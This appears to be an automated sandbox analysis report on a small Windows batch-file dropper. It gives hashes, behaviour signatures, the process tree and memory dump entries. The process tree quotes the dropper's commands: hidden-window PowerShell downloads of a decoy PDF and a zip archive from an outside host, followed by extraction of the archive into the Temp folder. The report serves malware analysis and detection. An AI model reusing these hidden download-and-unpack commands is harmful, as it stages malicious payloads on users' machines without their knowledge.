Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-01-2025 07:55

General

  • Target

    e8dfdb915a523a09e139aaa900991ddd.bat

  • Size

    498B

  • MD5

    e8dfdb915a523a09e139aaa900991ddd

  • SHA1

    d23f4798c549bfb7ddd968c4c2a971f67468a662

  • SHA256

    91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e

  • SHA512

    b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\e8dfdb915a523a09e139aaa900991ddd.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2152

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    ed96b1d3f1b0e7b7363427415e358c81

    SHA1

    bee8a0ca6b9cf068057b01a5788b26b82df00240

    SHA256

    4c642238dc07d37f7776ed90123d9d963be045035246e486232b8c2397043724

    SHA512

    fb05ebee076b34ba5946d12ac194e49a72523e5af94893c7d52367474dbb2eb20cc32896676fcd25f00826c09524299ba81c3d13edbd5ebf64d14a15c3ce7dbc

  • memory/1064-35-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB

  • memory/1064-36-0x0000000002820000-0x0000000002828000-memory.dmp

    Filesize

    32KB

  • memory/2252-4-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

    Filesize

    4KB

  • memory/2252-5-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

  • memory/2252-6-0x0000000002960000-0x0000000002968000-memory.dmp

    Filesize

    32KB

  • memory/2252-7-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-9-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-8-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-10-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/2252-11-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

  • memory/3008-22-0x00000000021F0000-0x00000000021F1000-memory.dmp

    Filesize

    4KB